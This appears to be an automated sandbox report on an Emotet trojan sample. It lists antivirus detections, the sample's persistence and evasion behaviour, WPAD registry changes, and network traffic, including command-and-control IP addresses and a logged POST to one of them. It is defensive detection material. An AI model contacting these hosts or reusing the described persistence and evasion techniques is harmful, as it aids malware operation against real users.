12.2
0-day
54 个模型检测该样本为恶意!
重新分析
更多

c8aad1a8f73c275254e8b0e864054868353e5dd1c5c56977a70643fa4493e313

7fdbf8e113c8bef6c80cabeb3b732750.exe

分析耗时

105s

最近分析

文件大小

72.0KB
静态报毒 动态报毒 AI SCORE=84 AIDETECTVM ATTRIBUTE CLASSIC CRYPTERX DOWNLOADER34 ELDORADO EMOTET GDMP GENCIRC GENERICKDZ GENETIC HFYT HGCC HIGH CONFIDENCE HIGHCONFIDENCE HUCBRM KRYPTIK MALWARE2 MALWARE@#5NG5JVYNIHBJ R + TROJ SCORE ST4LOPW1SFA SUSGEN THIBABO TYKNF UNSAFE 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Emotet-FSC!7FDBF8E113C8 20200928 6.0.6.653
Alibaba Trojan:Win32/Emotet.e7b351b9 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:CrypterX-gen [Trj] 20200929 18.4.3895.0
Tencent Malware.Win32.Gencirc.10cdfdce 20200929 1.0.0.1
Kingsoft 20200929 2013.8.14.323
CrowdStrike 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619715188.354001
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (5 个事件)
Time & API Arguments Status Return Repeated
1619715176.791001
CryptGenKey
crypto_handle: 0x008b5948
algorithm_identifier: 0x0000660e ()
provider_handle: 0x008b5078
flags: 1
key: f}e¶'_îoiÞ¾ §áGŽ
success 1 0
1619715188.370001
CryptExportKey
crypto_handle: 0x008b5948
crypto_export_handle: 0x008b57f0
buffer: f¤iñæ͝˜›¨ö8æ„qÇÜÊ%óNø \º‡Ù÷;¬„Üc—¦Õof «Þë", è‰ËuéþʗJŠZ•œ—­á0(1ºŒ­s ¶@ÊOLy+mÛq›3ž-r`g¿
blob_type: 1
flags: 64
success 1 0
1619715215.791001
CryptExportKey
crypto_handle: 0x008b5948
crypto_export_handle: 0x008b57f0
buffer: f¤ßùÒa8 Xµl6z{s·_õ©{½øããT*‰/©U¼AU<BÓDb(}Òd9syŠð‹GŽ¼73=@åé¨hv"l>À¹˜£BÀ7(ýtøY–sõJz’n«b
blob_type: 1
flags: 64
success 1 0
1619715219.776001
CryptExportKey
crypto_handle: 0x008b5948
crypto_export_handle: 0x008b57f0
buffer: f¤D¯íL‰‰ÑÝÁ²­ïþÎî†exùŽ'ÞOëäó¼áµ€êÏÚš“牗.ցÖÊ£ÂXë¹ pœ’%„Ã]eÛ?“¨‘¢éq—âlÇ+¿«é;:–ÔP9­<k
blob_type: 1
flags: 64
success 1 0
1619715223.463001
CryptExportKey
crypto_handle: 0x008b5948
crypto_export_handle: 0x008b57f0
buffer: f¤Ç4x¿ª*.‘PvnY·ÉŒåJÑ´oWË tÕ7ݱÃ~?ºLaÌÇ Í#¯ ´Kù*’.J3ñyˆª¬Æ“DZ8ÙÖÐ"+çóYe]*rÿ×Æ®DžWÓª
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 个事件)
packer Armadillo v1.71
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name None
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:2638715797&cup2hreq=f9f39ac45ddbe7c092b1696cf87ecd3d6da5b9910c5c23242e8ae572c6a9d4ad
Performs some HTTP requests (5 个事件)
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619686092&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e1a722ceaa122eb&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619686092&mv=m
request GET http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e1a722ceaa122eb&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619686092&mv=m
request POST https://update.googleapis.com/service/update2?cup2key=10:2638715797&cup2hreq=f9f39ac45ddbe7c092b1696cf87ecd3d6da5b9910c5c23242e8ae572c6a9d4ad
Sends data using the HTTP POST Method (1 个事件)
request POST https://update.googleapis.com/service/update2?cup2key=10:2638715797&cup2hreq=f9f39ac45ddbe7c092b1696cf87ecd3d6da5b9910c5c23242e8ae572c6a9d4ad
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619715169.854499
NtAllocateVirtualMemory
process_identifier: 1320
region_size: 45056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x004d0000
success 0 0
1619715231.745124
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000003e40000
success 0 0
1619715176.479001
NtAllocateVirtualMemory
process_identifier: 1804
region_size: 45056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00820000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (1 个事件)
Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 个事件)
Time & API Arguments Status Return Repeated
1619715169.854499
NtProtectVirtualMemory
process_identifier: 1320
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 28672
protection: 32 (PAGE_EXECUTE_READ)
process_handle: 0xffffffff
base_address: 0x004f1000
success 0 0
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1619715170.713499
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\7fdbf8e113c8bef6c80cabeb3b732750.exe
newfilepath: C:\Windows\SysWOW64\rasctrs\RPCNDFP.exe
newfilepath_r: C:\Windows\SysWOW64\rasctrs\RPCNDFP.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\7fdbf8e113c8bef6c80cabeb3b732750.exe
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619715189.838001
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.443297969664358 section {'size_of_data': '0x0000d000', 'virtual_address': '0x00005000', 'entropy': 7.443297969664358, 'name': '.rsrc', 'virtual_size': '0x0000ca48'} description A section with a high entropy has been found
entropy 0.7647058823529411 description Overall entropy of this PE file is high
Expresses interest in specific running processes (1 个事件)
process rpcndfp.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1619715188.791001
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (6 个事件)
host 142.44.137.67
host 162.241.242.173
host 172.217.24.14
host 192.158.216.73
host 85.214.28.226
host 203.208.40.34
Installs itself for autorun at Windows startup (1 个事件)
service_name RPCNDFP service_path C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\rasctrs\RPCNDFP.exe"
Created a service where a service was also not started (1 个事件)
Time & API Arguments Status Return Repeated
1619715172.182499
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x02d2b558
display_name: RPCNDFP
error_control: 0
service_name: RPCNDFP
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\rasctrs\RPCNDFP.exe"
filepath_r: "C:\Windows\SysWOW64\rasctrs\RPCNDFP.exe"
service_manager_handle: 0x02d2afb8
desired_access: 2
service_type: 16
password:
success 47363416 0
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1619715192.448001
RegSetValueExA
key_handle: 0x000003a0
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619715192.463001
RegSetValueExA
key_handle: 0x000003a0
value: @Chù<×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619715192.463001
RegSetValueExA
key_handle: 0x000003a0
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619715192.463001
RegSetValueExW
key_handle: 0x000003a0
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619715192.463001
RegSetValueExA
key_handle: 0x000003b8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619715192.463001
RegSetValueExA
key_handle: 0x000003b8
value: @Chù<×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619715192.463001
RegSetValueExA
key_handle: 0x000003b8
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619715192.463001
RegSetValueExW
key_handle: 0x0000039c
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Attempts to remove evidence of file being downloaded from the Internet (1 个事件)
file C:\Windows\SysWOW64\rasctrs\RPCNDFP.exe:Zone.Identifier
Generates some ICMP traffic
File has been identified by 54 AntiVirus engines on VirusTotal as malicious (50 out of 54 个事件)
Bkav W32.AIDetectVM.malware2
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.69918
FireEye Trojan.GenericKDZ.69918
McAfee Emotet-FSC!7FDBF8E113C8
Cylance Unsafe
Zillya Trojan.Emotet.Win32.28378
Sangfor Malware
K7AntiVirus Trojan ( 0056dc4f1 )
Alibaba Trojan:Win32/Emotet.e7b351b9
K7GW Trojan ( 0056dc4f1 )
Arcabit Trojan.Generic.D1111E
Invincea Mal/Generic-R + Troj/Emotet-CLZ
Cyren W32/Kryptik.BWJ.gen!Eldorado
Symantec ML.Attribute.HighConfidence
APEX Malicious
Paloalto generic.ml
ClamAV Win.Malware.Emotet-9753021-0
Kaspersky Trojan-Banker.Win32.Emotet.gdmp
BitDefender Trojan.GenericKDZ.69918
NANO-Antivirus Trojan.Win32.Emotet.hucbrm
Avast Win32:CrypterX-gen [Trj]
Tencent Malware.Win32.Gencirc.10cdfdce
Ad-Aware Trojan.GenericKDZ.69918
Emsisoft Trojan.Emotet (A)
Comodo Malware@#5ng5jvynihbj
DrWeb Trojan.DownLoader34.32574
VIPRE Trojan.Win32.Generic!BT
TrendMicro TrojanSpy.Win32.EMOTET.THIBABO
McAfee-GW-Edition BehavesLike.Win32.Emotet.lh
Sophos Troj/Emotet-CLZ
Jiangmin Trojan.Banker.Emotet.ohz
MaxSecure Trojan.Malware.106378983.susgen
Avira TR/Crypt.Agent.tyknf
Antiy-AVL Trojan[Banker]/Win32.Emotet
Microsoft Trojan:Win32/Emotet.ARJ!MTB
AegisLab Trojan.Win32.Emotet.L!c
ZoneAlarm Trojan-Banker.Win32.Emotet.gdmp
GData Trojan.GenericKDZ.69918
Cynet Malicious (score: 85)
AhnLab-V3 Malware/Win32.Generic.C4192543
ALYac Trojan.Agent.Emotet
MAX malware (ai score=84)
VBA32 Trojan.Downloader
Malwarebytes Trojan.MalPack.TRE
ESET-NOD32 a variant of Win32/Kryptik.HGCC
TrendMicro-HouseCall TrojanSpy.Win32.EMOTET.THIBABO
Rising Trojan.Kryptik!1.CBC1 (CLASSIC)
Yandex Trojan.Kryptik!St4LOPW1sFA
Ikarus Trojan-Banker.Emotet
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (8 个事件)
dead_host 203.208.40.34:443
dead_host 172.217.24.14:443
dead_host 162.241.242.173:8080
dead_host 192.158.216.73:80
dead_host 192.168.56.101:49187
dead_host 85.214.28.226:8080
dead_host 172.217.160.78:443
dead_host 192.168.56.101:49184
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-09-04 19:56:16

Imports

Library MFC42.DLL:
0x403038
0x40303c
0x403040
0x403044
0x403048
0x40304c
0x403050
0x403054
0x403058
0x40305c
0x403060
0x403064
0x403068
0x40306c
0x403070
0x403074
0x403078
0x40307c
0x403080
0x403084
0x403088
0x40308c
0x403090
0x403094
0x403098
0x40309c
0x4030a0
0x4030a4
0x4030a8
0x4030ac
0x4030b0
0x4030b4
0x4030b8
0x4030bc
0x4030c0
0x4030c4
0x4030c8
0x4030cc
0x4030d0
0x4030d4
0x4030d8
0x4030dc
0x4030e0
0x4030e4
0x4030e8
0x4030ec
0x4030f0
0x4030f4
0x4030f8
0x4030fc
0x403100
0x403104
0x403108
0x40310c
0x403110
0x403114
0x403118
0x40311c
0x403120
0x403124
0x403128
0x40312c
0x403130
0x403134
0x403138
0x40313c
0x403140
0x403144
0x403148
0x40314c
0x403150
0x403154
0x403158
0x40315c
0x403160
0x403164
0x403168
0x40316c
0x403170
0x403174
0x403178
0x40317c
0x403180
0x403184
0x403188
0x40318c
0x403190
0x403194
0x403198
0x40319c
0x4031a0
0x4031a4
0x4031a8
0x4031ac
0x4031b0
0x4031b4
0x4031b8
0x4031bc
0x4031c0
0x4031c4
0x4031c8
Library MSVCRT.dll:
0x4031d0 __set_app_type
0x4031d4 _except_handler3
0x4031d8 _controlfp
0x4031dc __p__commode
0x4031e0 _adjust_fdiv
0x4031e4 __setusermatherr
0x4031e8 _initterm
0x4031ec __getmainargs
0x4031f0 _acmdln
0x4031f4 exit
0x4031f8 _setmbcp
0x4031fc __CxxFrameHandler
0x403200 malloc
0x403204 __p__fmode
0x403208 __dllonexit
0x40320c _onexit
0x403210 _exit
0x403214 _XcptFilter
Library KERNEL32.dll:
0x40301c GetStartupInfoA
0x403020 GetModuleHandleA
0x403024 GetVersion
0x403028 lstrlenA
0x40302c GetProcAddress
0x403030 LoadLibraryW
Library USER32.dll:
0x40321c IsIconic
0x403220 GetSystemMetrics
0x403224 GetClientRect
0x403228 DrawIcon
0x40322c GetSystemMenu
0x403230 SendMessageA
0x403234 LoadIconA
0x403238 EnableWindow
0x40323c AppendMenuA
Library ADVAPI32.dll:
0x403000 RegSetValueExA
0x403004 RegQueryValueExA
0x403008 RegCreateKeyExA
0x40300c RegCloseKey
Library COMCTL32.dll:
0x403014

Exports

Ordinal Address Name
1 0x401780 GGADQEggsdeRRadwejhhgg

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49191 113.108.239.194 r1---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49192 113.108.239.196 r3---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49185 142.44.137.67 443
192.168.56.101 49188 203.208.40.98 update.googleapis.com 443
192.168.56.101 49190 203.208.41.65 redirector.gvt1.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 54178 114.114.114.114 53
192.168.56.101 54260 114.114.114.114 53
192.168.56.101 54991 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 58070 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 60221 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 53500 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57236 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e1a722ceaa122eb&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619686092&mv=m 
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e1a722ceaa122eb&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619686092&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=0-6977
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e1a722ceaa122eb&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619686092&mv=m 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e1a722ceaa122eb&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619686092&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com
http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com
http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619686092&mv=m&mvi=1&pl=23&shardbypass=yes 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619686092&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o7dn7e.gvt1.com
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e1a722ceaa122eb&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619686092&mv=m 
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e1a722ceaa122eb&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619686092&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=6978-19461
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com
http://142.44.137.67:443/WUwGJlu/Z7W4fbkazlni/iwl5WCVGN2l7/A5b5G/ 
POST /WUwGJlu/Z7W4fbkazlni/iwl5WCVGN2l7/A5b5G/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-----------JVIWZAsbQP6
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 142.44.137.67:443
Content-Length: 4532
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.